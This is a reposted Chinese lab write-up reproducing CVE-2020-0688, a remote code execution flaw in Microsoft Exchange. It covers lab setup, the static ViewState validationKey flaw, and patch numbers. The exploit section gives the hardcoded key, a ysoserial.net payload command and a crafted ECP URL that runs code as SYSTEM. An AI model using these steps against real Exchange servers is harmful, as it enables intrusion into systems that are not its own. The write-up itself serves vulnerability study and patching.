1. 黑客安全网-互联网安全媒体信息综合平台首页
  2. 漏洞信息

微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

环境搭建

使用Windows Server 2008安装Exchange Server 2013

  • 首先要在虚拟机内将Server2008设置为静态IP
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)
  • 在服务器管理器中选择添加角色-勾选域服务
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)
  • 安装完成后,在开始->运行打开dcpromo

微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

  • 点击两次下一步后,选择在新林中新建域

微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

  • 输入一个域名格式

微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

  • 选择win2008,勾选dns

微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

  • 设置密码

微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

  • 完成安装

微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

前期准备

  • 打开ad用户和计算机,选择users添加域用户
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)
  • 创建完成后更改域
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)
  • 输入刚刚添加的用户,之后重启计算机
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)
  • 使用刚才添加的用户登录后安装其他必备组件
    管理员启动powershell
    Import-Module ServerManager
    Add-WindowsFeature RSAT-ADDS
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)
  • 安装完成后重启计算机,使用管理员权限打开powershell
    Import-Module ServerManager
    Add-WindowsFeature NET-Framework, ADLDS
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)
  • 安装.Net 4.5

微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

  • 打开exchange,选择解压位置

微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

  • 开始安装Exchang
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)
  • 安装过程遇到一堆问题,挨个解决。。
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)
  • 开始正式安装
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

安装完成

微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

CVE-2020-0688漏洞复现

  • 漏洞详情
    具体来说,漏洞是在Exchange Control Panel (ECP)组件中发现的。这个漏洞的性质非常简单。与每次软件安装都会产生随机密钥不同,所有Microsoft Exchange Server在安装后的web.config文件中都拥有相同的validationKey和decryptionKey。这些密钥用于保证ViewState的安全性。而ViewState是ASP.NET Web应用以序列化格式存储在客户机上的服务端数据。客户端通过__VIEWSTATE请求参数将这些数据返回给服务器。
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

由于使用了静态密钥,经过身份验证的攻击者可以欺骗目标服务器反序列化恶意创建的ViewState数据。在YSoSerial.net的帮助下,攻击者可以在Exchange Control Panel web应用上执行任意.net代码。

  • 为了利用这个漏洞,我们需要从经过身份验证的session中收集ViewStateUserKey和__VIEWSTATEGENERATOR值。ViewStateUserKey可以从ASP.NET的_SessionIDcookie中获取,而ViewStateUserKey可以在一个隐藏字段中找到。所有这些都可以通过浏览器中的工具轻松找到。
    首先,进入192.168.92.128/ecp页面并登录。所使用的帐户不需要任何高权限
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)
  • 接下来,打开浏览器开发工具的Network选项,然后按F5重新发送请求。在页面源代码中可以找到 __VIEWSTATEGENERATOR,它的值是B97B4E27
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)
    然后,打开Headers选项卡并找到ASP.NET_SessionId=40c8e078-dc79-4001-9a52-de175b38a028
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)
  • 现在获得了攻击所需要的全部信息:
    –validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
    –validationalg = SHA1
    –generator = B97B4E27
    –viewstateuserkey = c1187666-c0ae-4f61-95d4-d2f5348d4300
  • 下一步是使用ysoserial.net生成ViewState的paylaod。通过创建文件C:TideSec.txt来演示远程代码执行:
    ysoserial.exe -p ViewState -g TextFormattingRunProperties -c “cmd /c echo test > C:TideSec.txt” –validationalg=”SHA1″ –validationkey=”CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF” –generator=”B97B4E27″ –viewstateuserkey=”c1187666-c0ae-4f61-95d4-d2f5348d4300″ –isdebug –islegacy
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)
  • 将输出结果进行URL编码并构造如下URL:
    https://192.168.92.128/ecp/default.aspx?VIEWSTATEGENERATOR=&VIEWSTATE=
    微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

浏览器内提交地址进行访问,回显500错误,但实际已经创建成功,并且可以看到是具有SYSTEM”权限的进程创建的。这表明攻击者可以以“SYSTEM”身份远程执行代码,完全破坏Exchange服务器。

微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

微软Exchange服务远程代码执行漏洞复现(CVE-2020-0688)

影响范围及加固

  • 影响版本
    影响所有版本的Exchang Server:
    Microsoft Exchange Server 2010 Service Pack 3
    Microsoft Exchange Server 2013
    Microsoft Exchange Server 2016
    Microsoft Exchange Server 2019
  • 防护措施
    补丁下载
    Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 KB4536989
    Microsoft Exchange Server 2013 Cumulative Update 23 KB4536988
    Microsoft Exchange Server 2016 Cumulative Update 14 KB4536987
    Microsoft Exchange Server 2016 Cumulative Update 15 KB4536987
    Microsoft Exchange Server 2019 Cumulative Update 3 KB4536987
    Microsoft Exchange Server 2019 Cumulative Update 4 KB4536987

参考链接

https://nosec.org/home/detail/4158.html

https://blog.csdn.net/u011189710/article/details/81150026

https://xz.aliyun.com/t/7299

相关推荐: Google Chrome浏览器漏洞使数十亿用户数据遭受被盗风险

Google Chrome浏览器存在安全漏洞,攻击者可利用该漏洞绕过网站上的内容安全策略(CSP),进而窃取用户数据并执行恶意代码。 网络安全研究人员表示,该漏洞(CVE-2020-6519)存在于Windows、Mac和Android的Chrome、Oper…

本文为转载文章,源自互联网,由网络整理整理编辑,转载请注明出处:https://www.hacksafe.net/vuls/4059.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注